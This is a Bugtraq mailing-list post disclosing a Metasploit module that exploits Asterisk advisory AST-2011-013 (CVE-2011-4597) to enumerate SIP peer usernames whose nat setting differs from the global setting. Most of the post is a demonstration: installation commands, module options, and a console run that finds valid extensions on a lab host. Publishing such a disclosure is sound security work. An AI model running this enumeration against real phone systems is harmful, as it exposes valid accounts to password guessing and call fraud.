Bugtraq mailing list archives
Exploit for Asterisk Security Advisory AST-2011-013
From: Ben Williams <ben+bugtraq () wushu net nz>
Date: Thu, 22 Dec 2011 22:01:41 +1300
A Metasploit module is attached that demonstrates how to enumerate Asterisk sip peers that have a nat setting different to the global sip nat setting as described in Asterisk Security Advisory AST-2011-013. The example below finds all peers with nat=yes, but the metasploit module will also work when global nat=yes and peers have nat=no. Vulnerability discovered and exploit created by Ben Williams. References: http://downloads.asterisk.org/pub/security/AST-2011-013.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597 Example sip.conf: [general] context=default alwaysauthreject = yes [1000] nat=yes type=peer secret=12345cdsf0sd9r2e9 callerid=John Doe <1000> host=dynamic context=trusted [1001] nat=yes secret=12345 type=peer host=dynamic [1002] secret=12345a type=peer host=dynamic # svn co https://www.metasploit.com/svn/framework3/trunk/ # cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/ # cd trunk # msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM =[ metasploit v4.0.0-release [core:4.0 api:1.0] + -- --=[ 716 exploits - 362 auxiliary - 68 post + -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13462 updated 143 days ago (2011.08.01)Warning: This copy of the Metasploit Framework was last updated 143 days ago. We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
msf auxiliary(enumerator_asterisk_nat_peers) > info
Name: SIP Username Enumerator for Asterisk (UDP) Security
Advisory AST-2011-013, CVE-2011-4597
Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers
Version: 1
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Ben Williams
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe
in each set
CHOST no The local client address CPORT 5070 no The local client port MAXEXT 9999 yes Ending extension MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum lengthRHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads Description: REGISTER scan for numeric peer usernames having a nat setting different to global sip nat setting. Works even when alwaysauthreject=yes. For this exploit to work, the source port cannot be 5060. For more details see Asterisk Project Security Advisory - AST-2011-013 msf auxiliary(enumerator_asterisk_nat_peers) > set RHOSTS 172.16.0.1 RHOSTS => 172.16.0.1 msf auxiliary(enumerator_asterisk_nat_peers) > set MINEXT 1000 MINEXT => 1000 msf auxiliary(enumerator_asterisk_nat_peers) > set MAXEXT 2000 MAXEXT => 2000 msf auxiliary(enumerator_asterisk_nat_peers) > run [*] Found user: 1000 <sip:1000@172.16.0.1> [Auth] [*] Found user: 1001 <sip:1001@172.16.0.1> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(enumerator_asterisk_nat_peers) >
Attachment:
enumerator_asterisk_nat_peers.rb
Description:
Current thread:
- Exploit for Asterisk Security Advisory AST-2011-013 Ben Williams (Dec 23)